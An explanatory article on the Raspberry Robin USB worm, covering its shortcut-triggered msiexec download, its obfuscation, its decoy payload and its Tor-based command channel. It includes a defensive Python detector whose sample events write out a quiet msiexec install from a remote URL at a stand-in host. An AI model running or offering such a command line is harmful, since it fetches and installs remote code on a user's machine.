In 2022, researchers from the threat intelligence firm Red Canary reported an infectious computer worm that had been present in customers’ environments since September 2021. According to a later analysis by Microsoft, this malware, dubbed “Raspberry Robin” by the researchers, may date back as far as 2019 and has since been integrated into a larger ecosystem of malware. New research by Trend Micro has uncovered an updated version of Raspberry Robin, which began spreading in September through telecommunications and government systems. This new variant attempts to deceive security researchers by hiding its true payload and deploying a decoy payload when it detects active security tools.
Cybersecurity analysts classify Raspberry Robin as a computer worm because it self-replicates. It spreads by copying itself from an infected machine to any attached USB drives and then infecting any machine those drives are later connected to. Raspberry Robin may not propagate as rapidly as worms that spread over the Internet or a local area network (LAN), but USB transmission makes it hazardous in other ways. The worm can lie dormant on a USB drive for extended periods and then reinfect computers that have already been cleaned. USB transmission also lets Raspberry Robin cross air gaps and reach systems with no network access, such as offline archives of sensitive data. If the worm is used to deliver destructive malware such as ransomware, an infection there could be catastrophic.
Researchers have observed Raspberry Robin deploying a variety of malicious payloads, frequently as part of multi-stage infection chains that can end in ransomware deployment. According to Microsoft, the worm has become one of the largest malware distribution platforms, and threat actors may be paying Raspberry Robin’s operators to install specific payloads on infected machines. In effect, Raspberry Robin has taken on the role of a malware dropper: it infects computers in order to install additional malware.
Unfortunately, Raspberry Robin is difficult for security researchers to detect and identify, let alone for anti-virus software. The worm’s infection chain begins with a .LNK shortcut file on a USB flash drive. When the drive is connected to a Windows system and the user double-clicks the shortcut, it launches a command that invokes the legitimate Windows Installer tool, msiexec.exe, to download and install a malicious MSI (Windows Installer) package from a remote server. Because that download is performed by a signed Microsoft binary rather than by the malware itself, simple executable allow-listing does not block this step. The malicious package contains a significant portion of the Raspberry Robin malware.
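The chain above has one property a defender can hunt for directly: the Windows Installer being handed a URL to install from, spawned from a command shell rather than an installer UI or management tool. As an added example that is not part of the original article or any vendor’s published detection, the following Python detector runs that check over constructed process-creation records. The field names follow the shape of Sysmon Event ID 1 (Image, ParentImage, CommandLine, CurrentDirectory); the sample events, the hostname example.invalid, and the “not on the system drive” heuristic are assumptions made for this example.

```python
import re
from typing import Optional

# Constructed process-creation records shaped like Sysmon Event ID 1 fields.
# They are sample data written for this example, not captured telemetry.
SAMPLE_EVENTS = [
    {   # cmd.exe spawned by explorer.exe: what a double-clicked shortcut on a USB drive looks like
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"cmd.exe /R start msiexec /q /i http://example.invalid:8080/pkg.msi",
        "CurrentDirectory": "E:\\",
    },
    {   # the Windows Installer fetching a package from a remote server, quietly
        "Image": r"C:\Windows\System32\msiexec.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"msiexec /q /i http://example.invalid:8080/pkg.msi",
        "CurrentDirectory": "E:\\",
    },
    {   # benign: an administrator installs a package from a local path
        "Image": r"C:\Windows\System32\msiexec.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'msiexec /i "C:\Users\admin\Downloads\tool.msi"',
        "CurrentDirectory": r"C:\Users\admin",
    },
]

# An http(s) URL anywhere in the command line; msiexec accepts one as the package to install.
URL_RE = re.compile(r"""https?://[^\s"']+""", re.IGNORECASE)
# The quiet-install switches (/q, /qn, /qb) as a standalone token.
QUIET_RE = re.compile(r"(?<!\S)/q[nb]?(?!\S)", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(event: dict) -> Optional[dict]:
    """Return a finding for msiexec.exe runs that install from a URL, else None.

    Only the msiexec-plus-URL combination fires; the remaining checks add context
    that raises the severity.
    """
    if basename(event.get("Image", "")) != "msiexec.exe":
        return None
    cmd = event.get("CommandLine", "")
    match = URL_RE.search(cmd)
    if match is None:
        return None  # local package path: not the pattern described above
    reasons = ["msiexec.exe given a remote URL to install"]
    if basename(event.get("ParentImage", "")) == "cmd.exe":
        reasons.append("launched from cmd.exe rather than an installer UI or management tool")
    if QUIET_RE.search(cmd):
        reasons.append("quiet install switch suppresses any installer prompt")
    cwd = event.get("CurrentDirectory", "")
    # Assumption for this example: a working directory off the system drive is treated
    # as a removable drive. Real deployments should check the drive type instead.
    if cwd and not cwd.upper().startswith("C:"):
        reasons.append(f"working directory {cwd} is not on the system drive")
    return {
        "url": match.group(0),
        "command_line": cmd,
        "reasons": reasons,
        "severity": "high" if len(reasons) >= 3 else "medium",
    }


def scan(events: list) -> list:
    """Run assess() over a batch of events and keep only the findings."""
    return [f for f in (assess(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["severity"].upper(), finding["url"])
        for reason in finding["reasons"]:
            print("  -", reason)
```

Only the second sample event produces a finding; the cmd.exe record is not msiexec and the local install carries no URL. In production the same rule would be expressed in the SIEM or EDR query language, but the shape is the same: the signed binary is allowed, the combination of arguments and parent is what is suspicious.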
The malicious code, however, is wrapped in more than ten layers of obfuscation. At runtime, each layer unpacks and decrypts the next in sequence. When this process reaches the payload loader, the loader checks for sandboxes and security analysis tools. If it detects any, it decompresses and loads a decoy payload intended to mislead security researchers. This decoy collects and exfiltrates system information and then downloads and installs adware. Researchers who observe only this behaviour could be misled into believing they have seen the full extent of the malware’s activity.
When the payload loader detects neither a sandbox nor security analysis tools, it unpacks and loads the far more malicious real payload. That payload modifies the Windows registry to elevate its privileges, evade detection, and establish persistence on the compromised system, abusing the user’s administrative permissions to do so. It also contains a Tor client, which the malware uses to communicate with command-and-control (C2) servers run by the threat actors behind Raspberry Robin. Once they have a backdoor into an infected system, the operators can send additional malicious payloads for the malware to install and execute.
This new variant of Raspberry Robin shows how far threat actors will go to build malware that evades both security researchers and anti-virus software. To avoid becoming the worm’s next victim, users and organizations should remain vigilant and avoid opening unfamiliar files, even ones that appear harmless on inspection, and in particular shortcuts found on USB drives of unknown origin.